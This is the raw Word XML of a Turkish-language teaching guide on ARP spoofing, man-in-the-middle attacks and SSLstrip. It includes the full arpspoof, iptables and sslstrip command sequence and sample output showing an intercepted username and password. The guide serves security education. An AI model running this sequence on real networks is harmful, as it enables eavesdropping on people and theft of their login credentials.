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1B355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🔎</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP Spo</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ofing Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A29B4DE" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve">Yerel ağlarda cihazlar, veri gönderebilmek için birbirlerinin </w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MAC adresini</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> bilmek zorundadır.</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:br/>
        <w:t xml:space="preserve">Bunu öğrenmek için </w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ARP protokolü</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0CA58E" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ARP Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t>, saldırganın kendisini ağdaki bir cihaz (genellikle modem/gateway) gibi göstererek, veri trafiğini üzerine çekmesidir.</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:br/>
        <w:t>Bu sayede iki cihaz arasındaki iletişime gizlice dahil olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59380AA2" w14:textId="67DC3B83" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C"/>
    <w:p w14:paraId="55FCBEB8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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM (Man-in-the-Middle) Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2D78D3" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:r w:rsidRPr="0006254C">
        <w:t>Bu saldırı tipinde saldırgan, iki cihaz arasında iletilen verileri:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57812A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İzleyebilir</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> (şifreleri görebilir),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114DB650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Yönlendirebilir</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> (kullanıcıyı sahte sitelere aktarabilir),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D57E1A4" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Değiştirebilir</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> (gönderilen/ alınan verileri manipüle edebilir).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7854D3" w14:textId="06E3F2F0" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C"/>
    <w:p w14:paraId="265B136C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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SSLstrip Nedir ve Neden Kullanılır?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F04D7E0" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve">Artık çoğu site </w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> kullanarak trafiği şifreler.</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:br/>
        <w:t>Bu da saldırganın verileri görememesi anlamına gelir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA6459" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSLstrip</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t>, bu şifrelemeyi atlatmak için kullanılır.</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:br/>
        <w:t xml:space="preserve">Yani kullanıcı HTTPS siteye gitmek ister ama saldırgan onu </w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP versiyonuna</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> yönlendirir. Böylece:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2048781C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 xml:space="preserve">Kullanıcının girdiği bilgiler </w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>şifrelenmemiş</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> şekilde iletilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1734927B" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0006254C">
        <w:t>Saldırgan bu bilgileri okuyabilir (kullanıcı adı, şifre gibi).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E43706" w14:textId="71EB90FD" w:rsidR="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C"/>
    <w:p w14:paraId="47D5F969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4. Kurulum Adımları (Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE0FC7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Aşağıdaki komutlarla gerekli araçlar kurulabilir:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A402EF1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update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B55B1E2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install dsniff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51961F3D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sudo apt-get install sslstrip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073955FC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5. Adım Adım Uygulama Süreci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA44A76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1. IP yönlendirmeyi aktif et:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C96742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echo 1 &gt; /proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638B395F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lastRenderedPageBreak/>
        <w:t>2. IPTables ile HTTP trafiğini SSLstrip'e yönlendir:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F24EF04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iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F24FCE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3. ARP Spoofing işlemini başlat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EC8CA5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arpspoof -i eth0 -t [hedef_ip] [modem_ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC64B1" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. SSLstrip’i çalıştır:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630FB077" w14:textId="77777777" w:rsidR="0006254C" w:rsidRP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sslstrip -l 10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1C116" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6. Örnek Terminal Çıktısı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4066C791" w14:textId="469B9A30" w:rsidR="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sslstrip 0.9 by Moxie Marlinspike running...</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>[*] Listening on 0.0.0.0:10000</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>[+] Spoofed connection: 192.168.1.105 -&gt; facebook.com</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>[+] Username: ozankullanici</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t>[+] Password: 12345678</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F96CDB" w14:textId="6CB38FE7" w:rsidR="00C57A5C" w:rsidRDefault="00C57A5C" w:rsidP="0006254C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FA48522" wp14:editId="7890F445">
            <wp:extent cx="5760720" cy="4150360"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="431400945" name="Resim 1" descr="metin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0945" name="Resim 1" descr="metin, ekran görüntüsü, yazıl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C416" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1FBFD1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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Uygulama Senaryosu (Basit Saldırı Akışı)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390E7836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 yönlendirme</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> aktif edilir (saldırgan cihazı veri geçişine açar).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B268DCC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lastRenderedPageBreak/>
        <w:t>ARP spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> ile hedef ve modem kandırılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111AD7AE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IPTables</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> ile gelen HTTP trafiği SSLstrip’e yönlendirilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD0D86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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSLstrip</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> gelen bağlantıyı HTTP’ye çevirerek kullanıcıdan veri toplar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A7EA5" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0006254C">
        <w:t>Toplanan kullanıcı adı ve şifre gibi bilgiler terminalde gözükür.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA9659F" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="00B779D0" w:rsidP="0006254C">
      <w:r>
        <w:pict w14:anchorId="5877E447">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC4AE5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Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Kullanılan Araçlar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC20DA2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arpspoof → ARP zehirleme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5191BC8B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sslstrip → HTTPS bağlantıyı HTTP'ye çevirme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFAFF47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iptables → Trafiği yönlendirme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E203E61" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0006254C">
        <w:t>echo → IP yönlendirmeyi açma komutu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC5C4B6" w14:textId="17EC45F1" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:r w:rsidRPr="0006254C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51183F46" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="00B779D0" w:rsidP="0006254C">
      <w:r>
        <w:pict w14:anchorId="092F51CC">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A40535F" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sonuç</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB2F6B" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:r w:rsidRPr="0006254C">
        <w:t>Bu senaryo sayesinde öğrenciler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6CF6D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Ağda veri trafiği nasıl çalışır,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB03AE0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>HTTPS neden önemlidir,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CF8426" w14:textId="77777777" w:rsidR="0006254C" w:rsidRPr="0006254C" w:rsidRDefault="0006254C" w:rsidP="0006254C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve">Ortadaki adam saldırısının nasıl işlediği gibi temel güvenlik bilgilerini </w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uygulamalı</w:t>
      </w:r>
      <w:r w:rsidRPr="0006254C">
        <w:t xml:space="preserve"> öğrenmiş olur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E4C286" w14:textId="77777777" w:rsidR="006C6F78" w:rsidRDefault="006C6F78"/>
    <w:sectPr w:rsidR="006C6F7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D9DEC" w14:textId="77777777" w:rsidR="00B779D0" w:rsidRDefault="00B779D0" w:rsidP="00A15E25">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0A69DD04" w14:textId="77777777" w:rsidR="00B779D0" w:rsidRDefault="00B779D0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1ACC5" w14:textId="77777777" w:rsidR="00B779D0" w:rsidRDefault="00B779D0" w:rsidP="00A15E25">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="71F7BD8C" w14:textId="77777777" w:rsidR="00B779D0" w:rsidRDefault="00B779D0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EF18D" w14:textId="5136B906" w:rsidR="00A15E25" w:rsidRDefault="00A15E25" w:rsidP="00A15E25">
    <w:pPr>
      <w:pStyle w:val="stBilgi"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="tr-TR"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B64ECED" wp14:editId="6303F29B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856"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="048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AB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="407E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079F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9B0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043C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9D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25C32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88B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97543"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAD2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78"/>
    <w:rsid w:val="0006254C"/>
    <w:rsid w:val="0012057E"/>
    <w:rsid w:val="005D10F2"/>
    <w:rsid w:val="006C6F78"/>
    <w:rsid w:val="00A15E25"/>
    <w:rsid w:val="00B779D0"/>
    <w:rsid w:val="00C5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3E606"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0810D9A2-03A9-4AA8-B5A6-11BDB14A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6F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6F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6F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6F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6F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6F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6F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6F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6F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6F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6F78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15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5E25"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AltBilgi">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="AltBilgiChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A15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5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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-22T11:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-22T18:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>